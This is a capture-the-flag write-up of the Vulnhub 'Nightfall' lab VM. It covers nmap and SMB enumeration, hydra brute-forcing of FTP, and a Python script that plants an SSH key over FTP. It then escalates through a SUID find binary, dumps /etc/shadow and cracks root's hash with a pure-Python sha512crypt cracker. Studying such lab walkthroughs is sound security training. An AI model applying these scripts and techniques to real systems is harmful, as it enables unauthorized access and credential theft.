
Vulnhub Nightfall

September 22, 2020 • Target machines

0x00 Environment

Target download: https://www.vulnhub.com/entry/sunset-nightfall,355/
Attacker IP: 172.20.10.3

0x01 Host discovery with nmap

A host-discovery sweep of the subnet locates the target at 172.20.10.4. The service scan below includes version detection, default scripts, OS detection and a traceroute, i.e. nmap -A against that address:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 20:31 EDT
Nmap scan report for 172.20.10.4
Host is up (0.00051s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         pyftpdlib 1.5.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 172.20.10.4:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 a9:25:e1:4f:41:c6:0f:be:31:21:7b:27:e3:af:49:a9 (RSA)
|   256 38:15:c9:72:9b:e0:24:68:7b:24:4b:ae:40:46:43:16 (ECDSA)
|_  256 9b:50:3b:2c:48:93:e1:a6:9d:b4:99:ec:60:fb:b6:46 (ED25519)
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 12
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolOld, FoundRows, InteractiveClient, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, Support41Auth, ODBCClient, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: OLmd,Js$Vcp+#m{C|fkg
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:47:6D:C6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: NIGHTFALL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: nightfall
|   NetBIOS computer name: NIGHTFALL\x00
|   Domain name: nightfall
|   FQDN: nightfall.nightfall
|_  System time: 2020-09-21T20:31:28-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-22T00:31:28
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 172.20.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.48 seconds

Ports 21, 22, 80, 139, 445 and 3306 are open. Start with port 80.

Port 80 serves only the Apache default page. Directory brute-forcing might turn up something sensitive, but for this box I left port 80 alone.

0x02 Information gathering

The other services are worth enumerating before attacking anything:
FTP: if anonymous login is allowed, nmap's ftp-anon script (run by default with -sC/-A) reports it; you then log in as ftp or anonymous with an empty password. The scan above shows no ftp-anon result, so anonymous login is not available here.
SMB: enum4linux pulls shares, users and policy over a null session:

enum4linux 172.20.10.4
S-1-5-21-1679783218-3562266554-4049818721-1048 *unknown*\*unknown* (8)
S-1-5-21-1679783218-3562266554-4049818721-1049 *unknown*\*unknown* (8)
S-1-5-21-1679783218-3562266554-4049818721-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)

The SID-cycling output lists two local Unix users: nightfall and matt.

0x03 Testing the services

With those two names in user.txt, I first brute-forced SMB:

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt smb://172.20.10.4

Nothing.

Then the same user list against FTP:

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 172.20.10.4 ftp

hydra finds matt's FTP password: cheese.

Logging in with it, the FTP root is worth comparing with a normal Linux home directory:

The FTP directory looks exactly like a user's home directory, which means pyftpdlib is serving matt's home and lets us write into it. So the route to a shell goes through the home directory: upload an SSH public key over FTP and log in as matt without a password. One detail to get right: sshd does not read the .pub file produced by ssh-keygen directly, it reads ~/.ssh/authorized_keys, so create a .ssh directory and put the public key line into a file named authorized_keys yourself, then upload that.
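Here is the upload step as a script, an added example for this write-up rather than the author's own commands. It assumes the FTP root is matt's home directory (as on this box) and that the server allows MKD and STOR there; the host, credentials and key file name are placeholders taken from the text, and SITE CHMOD support is assumed for pyftpdlib only. The script also validates the key line before uploading, because a private key or a mangled line uploaded by mistake fails silently with "Permission denied (publickey)":

```python
"""Plant an SSH public key in a home directory that an FTP server exposes.

Added example for this write-up, not the author's commands. Assumes the
FTP root *is* the user's home (true for matt on this box) and that MKD
and STOR are allowed there. HOST, USER, PASSWORD and KEY_FILE are
placeholders taken from the text.
"""
import base64
import ftplib
import io
import struct
from pathlib import Path
from typing import List, Tuple

HOST, USER, PASSWORD = "172.20.10.4", "matt", "cheese"
KEY_FILE = Path("matt_key.pub")   # from: ssh-keygen -t ed25519 -f matt_key -N ''

ALLOWED_TYPES = {"ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
                 "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data


def build_pubkey_line(key_type: str, raw_key: bytes, comment: str = "") -> str:
    """Encode an authorized_keys line. Used here only to construct demo keys;
    real keys come from ssh-keygen. The blob embeds the key type as its
    first wire string, which parse_openssh_pubkey() cross-checks."""
    blob = _ssh_string(key_type.encode()) + _ssh_string(raw_key)
    return f"{key_type} {base64.b64encode(blob).decode()} {comment}".rstrip()


def parse_openssh_pubkey(line: str) -> Tuple[str, str]:
    """Validate one authorized_keys line and return (key_type, comment).

    sshd skips lines it cannot parse without telling the client why, so
    catch the usual mistakes before uploading: a private key pasted
    instead of the .pub, a truncated base64 blob, or a blob whose
    embedded type does not match the leading word."""
    line = line.strip()
    if line.startswith("-----BEGIN"):
        raise ValueError("this is a PRIVATE key; upload the .pub file")
    parts = line.split(None, 2)
    if len(parts) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    key_type, b64 = parts[0], parts[1]
    comment = parts[2] if len(parts) == 3 else ""
    if key_type not in ALLOWED_TYPES:
        raise ValueError(f"unsupported key type {key_type!r}")
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError as exc:          # binascii.Error is a ValueError
        raise ValueError("key blob is not valid base64") from exc
    if len(blob) < 4:
        raise ValueError("key blob too short")
    (n,) = struct.unpack(">I", blob[:4])
    embedded = blob[4:4 + n].decode("ascii", "replace")
    if embedded != key_type:
        raise ValueError(f"blob is {embedded!r} but line says {key_type!r}")
    return key_type, comment


def is_valid_pubkey_line(line: str) -> bool:
    try:
        parse_openssh_pubkey(line)
        return True
    except ValueError:
        return False


def upload_authorized_keys(host: str, user: str, password: str,
                           pubkey_line: str, port: int = 21) -> List[str]:
    """Create ~/.ssh/authorized_keys over FTP; return the .ssh listing."""
    parse_openssh_pubkey(pubkey_line)                 # fail before touching the box
    payload = io.BytesIO(pubkey_line.strip().encode() + b"\n")
    with ftplib.FTP() as ftp:
        ftp.connect(host, port, timeout=10)
        ftp.login(user, password)
        try:
            ftp.mkd(".ssh")
        except ftplib.error_perm:                     # already exists
            pass
        ftp.cwd(".ssh")
        ftp.storbinary("STOR authorized_keys", payload)
        # sshd's StrictModes rejects a group/world-writable .ssh or
        # authorized_keys. pyftpdlib implements SITE CHMOD; other servers
        # may not, so a refusal here is not fatal.
        for cmd in ("SITE CHMOD 700 .", "SITE CHMOD 600 authorized_keys"):
            try:
                ftp.sendcmd(cmd)
            except ftplib.error_perm:
                pass
        return ftp.nlst()


if __name__ == "__main__":
    print(upload_authorized_keys(HOST, USER, PASSWORD, KEY_FILE.read_text()))
    # then:  ssh -i matt_key matt@172.20.10.4
```

Run it after ssh-keygen has produced matt_key.pub, then connect with ssh -i matt_key. If the login still fails after a successful upload, the usual cause is StrictModes rejecting a writable home directory, .ssh or authorized_keys.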

This gives a shell as matt. Next, privilege escalation.

0x04 Privilege escalation

sudo -l

sudo -l asks for matt's password, which we still do not have (the FTP credential cheese lives in pyftpdlib's own user list and does not necessarily match the system account).
So look for SUID binaries instead, using find to list files with the SUID bit set (-perm -4000).

The listing contains a copy of find at /scripts/find that is SUID and owned by nightfall. find's -exec runs a command for every match, and with the SUID bit that command runs with nightfall's effective uid:

/scripts/find . -exec id \;

uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
/scripts/find: ‘./.local/share’: Permission denied
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
/scripts/find: ‘./.gnupg’: Permission denied
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)

Each -exec runs with euid=1000(nightfall) while the real uid stays matt, which is why id prints both. Running a shell through -exec instead of id therefore gives a shell as nightfall.

Doing that escalates us to nightfall.
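An added example (not from the write-up) that does the SUID hunt in Python instead of with find, so that the owner of every SUID file is printed next to it. The point on this box is that /scripts/find is SUID nightfall rather than root, so the -exec trick only yields nightfall's privileges; a scan that shows owners makes that obvious up front. The SHELL_CAPABLE list and the demo tree are constructed for the example:

```python
"""List SUID/SGID files with their owners and flag the useful ones.

Added example for this write-up, not the author's code. It mirrors
find / -perm -4000 but shows the owner alongside, because a SUID binary
owned by a *non-root* user (/scripts/find, owner nightfall) only moves
you sideways to that user. SHELL_CAPABLE and the demo tree are
constructed for the example.
"""
import os
import pwd
import stat
import tempfile
from typing import Dict, List, Tuple

# Programs that hand out a shell or arbitrary file access when SUID
# (the GTFOBins pattern; find's -exec is the one used on this box).
SHELL_CAPABLE = {"find", "bash", "sh", "dash", "vim", "vi", "nano", "less",
                 "more", "python", "python3", "perl", "awk", "cp", "env", "nmap"}
PSEUDO_FS = {"/proc", "/sys", "/dev", "/run"}


def is_suid(mode: int) -> bool:
    return bool(mode & stat.S_ISUID)


def is_sgid(mode: int) -> bool:
    return bool(mode & stat.S_ISGID)


def owner_name(uid: int) -> str:
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def find_setid(root: str = "/") -> List[Dict]:
    """Walk root and return every regular file with SUID or SGID set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # prune pseudo-filesystems and do not descend into symlinked dirs
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in PSEUDO_FS
                       and not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and (is_suid(st.st_mode) or is_sgid(st.st_mode)):
                hits.append({"path": path, "uid": st.st_uid,
                             "owner": owner_name(st.st_uid),
                             "mode": oct(stat.S_IMODE(st.st_mode)),
                             "suid": is_suid(st.st_mode), "sgid": is_sgid(st.st_mode)})
    return hits


def interesting(hits: List[Dict]) -> List[Dict]:
    """SUID files worth trying first: owned by a non-root user (a lateral
    move to that account, as /scripts/find -> nightfall here) or a known
    shell-capable program (a jump straight to the owner, possibly root)."""
    return [h for h in hits
            if h["suid"] and (h["uid"] != 0
                              or os.path.basename(h["path"]) in SHELL_CAPABLE)]


def make_demo_tree() -> Tuple[str, str, bool]:
    """Constructed fixture: a temp dir holding a fake SUID 'scripts/find'
    owned by the current user. Returns (root, path, bit_was_set); a few
    filesystems silently drop the SUID bit, hence the flag."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    path = os.path.join(root, "scripts", "find")
    os.makedirs(os.path.dirname(path))
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(path, 0o4755)
    return root, path, is_suid(os.stat(path).st_mode)


if __name__ == "__main__":
    for h in interesting(find_setid("/")):
        print(f"{h['mode']} {h['owner']:<10} {h['path']}")
    # On the box the hit is /scripts/find owned by nightfall. Swap id for a
    # shell to keep its euid:   /scripts/find . -exec /bin/sh -p \; -quit
    # (-p stops bash from dropping the euid; Debian's /bin/sh is dash, which
    # keeps it anyway; -quit stops GNU find spawning one shell per entry.)
```

On a target without python3 the one-liner in the comment is the whole technique; the script matters when there are many SUID files and you want the non-root-owned ones sorted out from the usual passwd/sudo/mount set.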

0x05 Getting a root shell

Same trick as before: from the nightfall shell, drop the public key into nightfall's home directory (~/.ssh/authorized_keys) and log in over SSH without a password.

Once logged in as nightfall, checking sudo permissions shows this user may run cat as root, which is enough to read /etc/shadow and take root's password hash:

sudo cat /etc/shadow

root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::
daemon:*:18126:0:99999:7:::
bin:*:18126:0:99999:7:::
sys:*:18126:0:99999:7:::
sync:*:18126:0:99999:7:::
games:*:18126:0:99999:7:::
man:*:18126:0:99999:7:::
lp:*:18126:0:99999:7:::
mail:*:18126:0:99999:7:::
news:*:18126:0:99999:7:::
uucp:*:18126:0:99999:7:::
proxy:*:18126:0:99999:7:::
www-data:*:18126:0:99999:7:::
backup:*:18126:0:99999:7:::
list:*:18126:0:99999:7:::
irc:*:18126:0:99999:7:::
gnats:*:18126:0:99999:7:::
nobody:*:18126:0:99999:7:::
_apt:*:18126:0:99999:7:::
systemd-timesync:*:18126:0:99999:7:::
systemd-network:*:18126:0:99999:7:::
systemd-resolve:*:18126:0:99999:7:::
messagebus:*:18126:0:99999:7:::
avahi-autoipd:*:18126:0:99999:7:::
avahi:*:18126:0:99999:7:::
saned:*:18126:0:99999:7:::
colord:*:18126:0:99999:7:::
hplip:*:18126:0:99999:7:::
nightfall:$6$u9n0NMGDN2h3/Npy$y/PVdaqMcdobHf4ZPvbrHNFMwMkPWwamWuKGxn2wqJygEC09UNJNb10X0HBK15Hs4ZwyFtdwixyyfu2QEC1U4/:18134:0:99999:7:::
systemd-coredump:!!:18126::::::
sshd:*:18126:0:99999:7:::
mysql:!:18126:0:99999:7:::
matt:$6$2u38Z1fOk8zIC5kO$oSfp/Ic0Uhb9225EdHB63ugob.B58mPuJJ8YpMB9hNaZAoJk9n3rhs9DHobzmsB20E5Yxjqsnn1x.QGKeAmiR1:18134:0:99999:7:::

Crack root's $6$ (sha512crypt) hash with john: save root's shadow line to a file, run john against it with a wordlist, and read the result with john --show. Each guess costs 5000 chained SHA-512 rounds, so this is far slower than the hydra runs and a targeted wordlist pays off.

john recovers root's password: miguel2.
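To see what john actually computes for a $6$ hash, here is a pure-hashlib sha512crypt implementation added for this write-up (not the author's code and not john's). It follows Drepper's SHA-crypt specification, whose published test vector it reproduces, so a cracked password can be re-verified or a short wordlist tried with nothing but the standard library. ROOT_SHADOW is the line read from the box; the mini wordlist in the demo run is constructed, since the page does not show which list john was run with:

```python
"""sha512crypt ($6$) in pure hashlib, to check a cracked shadow password.

Added example for this write-up; not the author's code and not john's.
Implements Drepper's SHA-crypt specification (the function john's
sha512crypt format computes) so a candidate can be verified, or a small
wordlist tried, with only the standard library. ROOT_SHADOW is the
line read from the box; the wordlist in __main__ is constructed.
"""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

ROOT_SHADOW = ("root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6co"
               "Zs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::")

_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Order in which bytes of the final digest are emitted (from the spec).
_ORDER = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
          (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
          (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
          (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
          (62, 20, 41)]


def _b64_24bit(b2: int, b1: int, b0: int, n: int) -> str:
    """crypt(3)'s little-endian base64 of a 24-bit group, n characters."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(_B64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha512crypt(password: str, salt: str, rounds: Optional[int] = None) -> str:
    """Return '$6$[rounds=N$]salt$digest' exactly as /etc/shadow stores it."""
    pw, sl = password.encode(), salt.encode()[:16]      # salt is capped at 16 bytes
    r = 5000 if rounds is None else min(max(rounds, 1000), 999_999_999)
    # B = H(pw || salt || pw); A = H(pw || salt || B-derived padding)
    b = hashlib.sha512(pw + sl + pw).digest()
    a = hashlib.sha512(pw + sl)
    a.update(b * (len(pw) // 64) + b[:len(pw) % 64])
    n = len(pw)
    while n:                          # bits of len(pw), lowest first
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    # P and S: password- and salt-derived byte strings as long as their source
    dp = hashlib.sha512(pw * len(pw)).digest()
    p = (dp * (len(pw) // 64 + 1))[:len(pw)]
    ds = hashlib.sha512(sl * (16 + a[0])).digest()
    s = (ds * (len(sl) // 64 + 1))[:len(sl)]
    # the expensive part: `rounds` chained SHA-512 computations
    c = a
    for i in range(r):
        h = hashlib.sha512(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    enc = "".join(_b64_24bit(c[x], c[y], c[z], 4) for x, y, z in _ORDER)
    enc += _b64_24bit(0, 0, c[63], 2)
    prefix = "$6$" + (f"rounds={r}$" if rounds is not None else "")
    return prefix + sl.decode() + "$" + enc


def parse_shadow_line(line: str) -> Tuple[str, str, Optional[int], str]:
    """'user:$6$[rounds=N$]salt$digest:...' -> (user, salt, rounds, full_hash)."""
    user, full = line.split(":")[:2]
    if not full.startswith("$6$"):
        raise ValueError("not a sha512crypt hash")
    fields = full[3:].split("$")
    rounds = None
    if fields[0].startswith("rounds="):
        rounds = int(fields[0][len("rounds="):])
        fields = fields[1:]
    return user, fields[0], rounds, full


def verify(shadow_line: str, candidate: str) -> bool:
    _, salt, rounds, full = parse_shadow_line(shadow_line)
    return hmac.compare_digest(sha512crypt(candidate, salt, rounds), full)


def crack(shadow_line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Tiny stand-in for john --wordlist: the first candidate that verifies."""
    for word in wordlist:
        word = word.rstrip("\n")
        if verify(shadow_line, word):
            return word
    return None


if __name__ == "__main__":
    # constructed mini-wordlist standing in for whatever list john was run with
    print(crack(ROOT_SHADOW, ["password", "nightfall", "miguel", "miguel2"]))
```

At roughly a few hundred guesses per second in pure Python this is only for confirming a result or checking a handful of likely passwords; john's optimised SHA-512 (or hashcat on a GPU) is what you actually run a wordlist through.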

Logging in with it gives a root shell.